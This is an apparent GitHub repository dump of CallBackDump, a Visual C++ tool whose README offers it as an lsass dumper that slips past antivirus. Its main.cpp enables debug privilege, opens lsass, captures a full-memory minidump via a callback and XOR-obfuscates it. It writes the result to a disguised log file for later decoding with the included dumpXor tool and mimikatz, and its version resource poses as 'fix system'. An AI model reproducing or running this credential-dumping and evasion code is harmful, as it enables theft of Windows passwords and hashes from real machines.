Repository: seventeenman/CallBackDump
Branch: main
Commit: d4ac4564e74f
Files: 15
Total size: 29.2 KB
Directory structure:
gitextract_e5ddyv_y/
├── CallbackDump/
│ ├── CallbackDump/
│ │ ├── CallbackDump.aps
│ │ ├── CallbackDump.rc
│ │ ├── CallbackDump.vcxproj
│ │ ├── CallbackDump.vcxproj.filters
│ │ ├── CallbackDump.vcxproj.user
│ │ ├── global.h
│ │ ├── main.cpp
│ │ └── resource.h
│ └── CallbackDump.sln
├── README.md
└── dumpXor/
├── dumpXor/
│ ├── dumpXor.vcxproj
│ ├── dumpXor.vcxproj.filters
│ ├── dumpXor.vcxproj.user
│ └── main.cpp
└── dumpXor.sln
================================================
FILE CONTENTS
================================================
================================================
FILE: CallbackDump/CallbackDump/CallbackDump.rc
================================================
// Microsoft Visual C++ generated resource script.
//
#include "resource.h"
#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "winres.h"
/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
// Chinese (Simplified, PRC) resources
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
#pragma code_page(936)
#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//
1 TEXTINCLUDE
BEGIN
"resource.h\0"
END
2 TEXTINCLUDE
BEGIN
"#include ""winres.h""\r\n"
"\0"
END
3 TEXTINCLUDE
BEGIN
"\r\n"
"\0"
END
#endif // APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Version
//
VS_VERSION_INFO VERSIONINFO
FILEVERSION 2,1,6,6
PRODUCTVERSION 2,1,6,6
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
#else
FILEFLAGS 0x0L
#endif
FILEOS 0x40004L
FILETYPE 0x1L
FILESUBTYPE 0x0L
BEGIN
BLOCK "StringFileInfo"
BEGIN
BLOCK "080404b0"
BEGIN
VALUE "CompanyName", "system"
VALUE "FileDescription", "system"
VALUE "FileVersion", "2.1.6.6"
VALUE "InternalName", "fixSystem.exe"
VALUE "LegalCopyright", "Copyright (C) 2022"
VALUE "OriginalFilename", "Callback.exe"
VALUE "ProductName", "fix system"
VALUE "ProductVersion", "2.1.6.6"
END
END
BLOCK "VarFileInfo"
BEGIN
VALUE "Translation", 0x804, 1200
END
END
#endif // Chinese (Simplified, PRC) resources
/////////////////////////////////////////////////////////////////////////////
#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//
/////////////////////////////////////////////////////////////////////////////
#endif // not APSTUDIO_INVOKED
================================================
FILE: CallbackDump/CallbackDump/CallbackDump.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{ae20b179-5a3a-4aa9-96fa-acccb1c721e5}</ProjectGuid>
<RootNamespace>CallbackDump</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="global.h" />
<ClInclude Include="resource.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="CallbackDump.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: CallbackDump/CallbackDump/CallbackDump.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="global.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>头文件</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="CallbackDump.rc">
<Filter>资源文件</Filter>
</ResourceCompile>
</ItemGroup>
</Project>
================================================
FILE: CallbackDump/CallbackDump/CallbackDump.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
================================================
FILE: CallbackDump/CallbackDump/global.h
================================================
#pragma once
// Win32 / ntdll / DbgHelp entry points resolved at run time with
// GetProcAddress instead of through the executable's import table.
//
// Review notes:
//  * This header declares no includes of its own; it relies on main.cpp having
//    included <windows.h>, <DbgHelp.h> and <TlHelp32.h> before it.
//  * These are non-static definitions in a header. That only links because a
//    single translation unit (main.cpp) includes it; a second include would
//    produce duplicate-symbol errors.
//  * Every pointer is initialised during static initialisation and none of the
//    GetProcAddress / GetModuleHandleW results is checked. A failed lookup
//    leaves the pointer NULL and the first call through it in main.cpp
//    dereferences NULL.
typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(
    ULONG Privilege, BOOL Enable,
    BOOL CurrentThread, PULONG Enabled);
// ntdll!RtlAdjustPrivilege (undocumented); main() passes privilege value 20
// to enable the debug privilege in the current process token.
_RtlAdjustPrivilege MRtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(
    GetModuleHandleW(L"ntdll.dll"), "RtlAdjustPrivilege");
typedef LPVOID(WINAPI* _HeapAlloc)(
    HANDLE hHeap , DWORD dwFlags,
    SIZE_T dwBytes);
// kernel32!HeapAlloc; used once, to allocate the global dump buffer in main.cpp.
_HeapAlloc MHeapAlloc = (_HeapAlloc)GetProcAddress(
    GetModuleHandleW(L"Kernel32.dll"), "HeapAlloc");
typedef HANDLE(WINAPI* _CreateToolhelp32Snapshot)(
    DWORD dwFlags, DWORD th32ProcessID);
// kernel32!CreateToolhelp32Snapshot / Process32FirstW / Process32NextW:
// the process-enumeration trio used by main() to locate the target PID.
_CreateToolhelp32Snapshot MCreateToolhelp32Snapshot = (_CreateToolhelp32Snapshot)GetProcAddress(
    GetModuleHandleW(L"Kernel32.dll"), "CreateToolhelp32Snapshot");
typedef BOOL(WINAPI* _Process32FirstW)(
    HANDLE hSnapshot, LPPROCESSENTRY32W lppe);
_Process32FirstW MProcess32FirstW = (_Process32FirstW)GetProcAddress(
    GetModuleHandleW(L"Kernel32.dll"), "Process32FirstW");
typedef BOOL(WINAPI* _Process32NextW)(
    HANDLE hSnapshot, LPPROCESSENTRY32W lppe);
_Process32NextW MProcess32NextW = (_Process32NextW)GetProcAddress(
    GetModuleHandleW(L"Kernel32.dll"), "Process32NextW");
typedef HANDLE(WINAPI* _OpenProcess)(
    DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
// kernel32!OpenProcess; main() requests PROCESS_ALL_ACCESS on the target.
_OpenProcess MOpenProcess = (_OpenProcess)GetProcAddress(
    GetModuleHandleW(L"Kernel32.dll"), "OpenProcess");
typedef BOOL(WINAPI* _MiniDumpWriteDump)(
    HANDLE hProcess, DWORD ProcessId,
    HANDLE hFile, MINIDUMP_TYPE DumpType,
    PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
    PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
    PMINIDUMP_CALLBACK_INFORMATION CallbackParam);
// dbghelp!MiniDumpWriteDump. Dbghelp.dll is not necessarily loaded yet at
// static-init time, so LoadLibraryA is used instead of GetModuleHandleW.
// The returned module handle is never released (process lifetime). Note that
// main.cpp also links Dbghelp.lib via #pragma comment, so the dynamic
// resolution here is redundant with a static import of the same DLL.
_MiniDumpWriteDump MMiniDumpWriteDump = (_MiniDumpWriteDump)GetProcAddress(
    LoadLibraryA("Dbghelp.dll"), "MiniDumpWriteDump");
// In-place repeating-key XOR over the first `length` bytes of `content`.
// Returns `content`. Because XOR is an involution, applying the same call
// again with the same key restores the original bytes.
//
// Review notes:
//  * `sizeof(secretKey)` is the size of a `char*`, not of the key string:
//    8 on x64, 4 on Win32. Only that many leading key bytes are ever used,
//    so the caller's "thisisgood" is effectively "thisisgo" (x64) or
//    "this" (Win32). The dumpXor decoder has the same sizeof() mistake and
//    therefore only round-trips when built for the same bitness.
//  * This is obfuscation, not encryption; it provides no confidentiality.
//  * `extern` on a function definition is legal but has no effect here.
//  * No NULL / zero-length checks; `length == 0` is a no-op.
extern char * Xorcrypt(char* content, DWORD length ,char* secretKey)
{
    for (UINT i = 0; i < length; i++)
    {
        // Key index wraps at the pointer size, not at strlen(secretKey).
        content[i] ^= secretKey[i % sizeof(secretKey)];
    }
    return content;
}
================================================
FILE: CallbackDump/CallbackDump/main.cpp
================================================
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <TlHelp32.h>
#include <processsnapshot.h>
#pragma comment (lib, "Dbghelp.lib")
#include "global.h"
// Buffer for saving the minidump
// Fixed 75 MiB zero-filled heap buffer that minidumpCallback copies dump
// chunks into, placed at callbackInput->Io.Offset.
// Review notes: the HeapAlloc result is not checked (NULL on failure), the
// callback never compares Offset + BufferBytes against this size, and the
// buffer is never freed. A dump larger than 75 MiB writes past the end of
// this allocation (heap corruption) rather than failing.
LPVOID buffer = MHeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024 * 1024 * 75);
// Running sum of the BufferBytes delivered to IoWriteAllCallback; main()
// later uses it as the number of bytes to copy, XOR and write out.
DWORD bytesRead = 0;
// MINIDUMP_CALLBACK_ROUTINE handed to MiniDumpWriteDump by main().
//
// main() passes a NULL hFile and this callback answers IoStartCallback with
// S_FALSE; under DbgHelp's callback contract that routes the dump output
// through IoWriteAllCallback instead of a file handle, so every chunk of the
// minidump arrives here and is memcpy'd into the global `buffer`.
//
// Parameters:
//   callbackParam  - unused (main() passes NULL).
//   callbackInput  - type of event plus, for I/O events, the chunk
//                    (Io.Buffer / Io.BufferBytes / Io.Offset).
//   callbackOutput - receives the Status that MiniDumpWriteDump acts on.
// Returns TRUE for every event.
//
// Review notes:
//  * No bounds check: destination = buffer + Io.Offset and the copy length
//    is Io.BufferBytes, neither compared with the 75 MiB allocation.
//  * `bytesRead` is a sum of chunk sizes, not the highest end offset
//    reached; if chunks were delivered out of order or overlapping the two
//    would differ (presumably they are sequential here -- not verified).
//  * `return true` and `return TRUE` are mixed; both yield the same BOOL.
BOOL CALLBACK minidumpCallback(
    __in PVOID callbackParam,
    __in const PMINIDUMP_CALLBACK_INPUT callbackInput,
    __inout PMINIDUMP_CALLBACK_OUTPUT callbackOutput
)
{
    LPVOID destination = 0, source = 0;
    DWORD bufferSize = 0;
    switch (callbackInput->CallbackType)
    {
    case IoStartCallback:
        // S_FALSE: decline the file-based path so I/O goes through this
        // callback (see the header comment).
        callbackOutput->Status = S_FALSE;
        break;
    // Gets called for each lsass process memory read operation
    case IoWriteAllCallback:
        callbackOutput->Status = S_OK;
        // A chunk of minidump data that's been jus read from lsass.
        // This is the data that would eventually end up in the .dmp file on the disk, but we now have access to it in memory, so we can do whatever we want with it.
        // We will simply save it to dumpBuffer.
        source = callbackInput->Io.Buffer;
        // Calculate location of where we want to store this part of the dump.
        // Destination is start of our dumpBuffer + the offset of the minidump data
        destination = (LPVOID)((DWORD_PTR)buffer + (DWORD_PTR)callbackInput->Io.Offset);
        // Size of the chunk of minidump that's just been read.
        bufferSize = callbackInput->Io.BufferBytes;
        bytesRead += bufferSize;
        // Unchecked copy into the fixed-size global buffer (see review notes).
        RtlCopyMemory(destination, source, bufferSize);
        break;
    case IoFinishCallback:
        callbackOutput->Status = S_OK;
        break;
    default:
        return true;
    }
    return TRUE;
}
// Sleeps for `milliseconds` via ntdll!NtDelayExecution instead of Sleep().
//
// On the first call it also invokes ZwSetTimerResolution(1, TRUE, ...),
// requesting the finest timer resolution (100 ns units); that setting is
// never reverted and stays in effect for the rest of the process.
//
// Review notes:
//  * Both function pointers are resolved lazily with GetProcAddress and a
//    failed lookup is skipped silently, so on failure this returns at once
//    without waiting.
//  * The delay is a negative (relative) count of 100 ns intervals;
//    `(int)(milliseconds * 10000)` overflows for milliseconds > ~214,748.
//  * `once` is a plain static with no synchronisation; main() is the only
//    caller and calls it once from a single thread.
void nt_wait(DWORD milliseconds)
{
    static NTSTATUS(__stdcall * NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) = (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER)) GetProcAddress(GetModuleHandleA(("ntdll.dll")), ("NtDelayExecution"));
    static NTSTATUS(__stdcall * ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) = (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG)) GetProcAddress(GetModuleHandleA(("ntdll.dll")), ("ZwSetTimerResolution"));
    static bool once = true;
    if (once && ZwSetTimerResolution != NULL) {
        ULONG actualResolution;
        // Request 1 x 100 ns; the resolution actually granted is discarded.
        ZwSetTimerResolution(1, true, &actualResolution);
        once = false;
    }
    LARGE_INTEGER interval;
    // Negative value = relative delay, in 100 ns units (1 ms = 10,000 units).
    interval.QuadPart = -1 * (int)(milliseconds * 10000);
    if (NtDelayExecution != NULL)
    {
        // Non-alertable wait; the NTSTATUS result is ignored.
        NtDelayExecution(false, &interval);
    }
}
// Entry point: locates lsass.exe, captures a full-memory minidump of it
// through minidumpCallback into the global `buffer`, XORs the bytes with a
// fixed key and writes the result to a hard-coded path under
// C:\Users\Public\Downloads.
//
// Arguments: runs only when invoked with exactly one argument equal to "to";
// any other argument count or value exits immediately with an arbitrary
// non-zero product as the exit code (the CRT globals __argc/__argv are used
// instead of the argc/argv parameters, which are otherwise unused).
// Returns 0 after the dump attempt, whether or not it succeeded.
//
// Review notes (defects visible in this function):
//  * The process loop never tests the entry returned by Process32FirstW
//    (processName is "" on the first comparison), and if lsass.exe is never
//    reached Process32NextW fails, leaves processEntry unchanged and the
//    loop spins forever.
//  * The snapshot handle and `lHandle` are never closed; the 75 MiB
//    `buffer` and the `new char[size]` copy are never freed.
//  * Return values of RtlAdjustPrivilege, OpenProcess (NULL when the caller
//    lacks the privilege), CreateFile (INVALID_HANDLE_VALUE) and the
//    MiniDumpWriteDump failure path are not checked or reported.
//  * Xorcrypt uses only sizeof(char*) bytes of "thisisgood" (see global.h).
int main(int argc, char* argv[]) {
    if (__argc == 1) {
        return 7899 * 1777;
    }
    else if (__argc == 2) {
        if (strcmp(__argv[1], "to") != 0)
        {
            return 7 * 12899;
        }
    }
    else {
        return 1717 * 1888;
    }
    // Unconditional 10 s pause before doing anything else.
    nt_wait(10000);
    DWORD PID = 0;
    DWORD bytesWritten = 0;
    HANDLE lHandle = NULL;
    // Result not compared with INVALID_HANDLE_VALUE; never closed.
    HANDLE snapshot = MCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    LPCWSTR processName = L"";
    PROCESSENTRY32 processEntry = {};
    processEntry.dwSize = sizeof(PROCESSENTRY32);
    ULONG t;
    // Get lsass PID
    if (MProcess32FirstW(snapshot, &processEntry)) {
        // Case-insensitive match on szExeFile. The Process32FirstW entry is
        // skipped, and a FALSE from Process32NextW does not exit the loop.
        while (_wcsicmp(processName, L"lsass.exe") != 0) {
            MProcess32NextW(snapshot, &processEntry);
            processName = processEntry.szExeFile;
            PID = processEntry.th32ProcessID;
        }
    }
    // enable debug privilege
    // Privilege 20 = SeDebugPrivilege; `t` receives the previous state.
    // The NTSTATUS is ignored, so a non-elevated caller proceeds regardless.
    MRtlAdjustPrivilege(20, TRUE, FALSE, &t);
    // NULL on failure; not checked before use below. Never closed.
    lHandle = MOpenProcess(PROCESS_ALL_ACCESS, 0, PID);
    // Set up minidump callback
    MINIDUMP_CALLBACK_INFORMATION callbackInfo;
    ZeroMemory(&callbackInfo, sizeof(MINIDUMP_CALLBACK_INFORMATION));
    callbackInfo.CallbackRoutine = &minidumpCallback;
    callbackInfo.CallbackParam = NULL;
    // Dump lsass
    // hFile is NULL: output is delivered to minidumpCallback (see its
    // IoStartCallback handling) rather than written to a file by DbgHelp.
    BOOL isD = MMiniDumpWriteDump(lHandle, PID, NULL, MiniDumpWithFullMemory, NULL, NULL, &callbackInfo);
    if (isD)
    {
        long int size = bytesRead;
        // Heap copy of the dump; never delete[]'d.
        char *securitySth = new char[size];
        char *key = (char *)"thisisgood";
        memcpy(securitySth,buffer,bytesRead);
        // In-place XOR; returns the same pointer.
        securitySth = Xorcrypt(securitySth, bytesRead, key);
        // At this point, we have the lsass dump in memory at location dumpBuffer - we can do whatever we want with that buffer, i.e encrypt & exfiltrate
        // Hard-coded, world-writable destination; handle not checked for
        // INVALID_HANDLE_VALUE before WriteFile/CloseHandle.
        HANDLE outFile = CreateFile(L"C:\\Users\\Public\\Downloads\\VM21-6-8.log", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        //// For testing purposes, let's write lsass dump to disk from our own dumpBuffer and check if mimikatz can work it
        if (WriteFile(outFile, securitySth, bytesRead, &bytesWritten, NULL))
        {
            printf("\n[+] to C:\\Users\\Public\\Downloads\\VM21-6-8.log\n");
        }
        CloseHandle(outFile);
    }
    // Silent on failure: no message when isD is FALSE.
    return 0;
}
================================================
FILE: CallbackDump/CallbackDump/resource.h
================================================
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by CallbackDump.rc
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 101
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
================================================
FILE: CallbackDump/CallbackDump.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.3.32825.248
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CallbackDump", "CallbackDump\CallbackDump.vcxproj", "{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x64.ActiveCfg = Debug|x64
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x64.Build.0 = Debug|x64
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x86.ActiveCfg = Debug|Win32
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x86.Build.0 = Debug|Win32
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x64.ActiveCfg = Release|x64
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x64.Build.0 = Release|x64
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x86.ActiveCfg = Release|Win32
{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {61DC3699-9F4E-4BF9-AB81-CCAF773B4ADA}
EndGlobalSection
EndGlobal
================================================
FILE: README.md
================================================
# CallBackDump
能过国内杀软的dump lsass进程工具,参考代码链接在下面。
由minidumpCallback实现,对缓冲区中内存做了些修改后再写入磁盘,同时做了一些小细节修改。
需要注意的是别扔云沙箱,这工具也没有任何网络行为。



# 环境
VS2022
# 用法
`CallbackDump.exe to` 将lsass进程dump成VM21-6-8.log
`dumpXor.exe VM21-6-8.log 1.bin` 将加密的进程文件解密
# 详解
[Dumping Lsass Process Memory In Different Ways - 跳跳糖](https://tttang.com/archive/1810/)
# 参考链接
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
================================================
FILE: dumpXor/dumpXor/dumpXor.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{9cc63db2-7fc6-4d54-a0e4-cd91e124bfd4}</ProjectGuid>
<RootNamespace>dumpXor</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
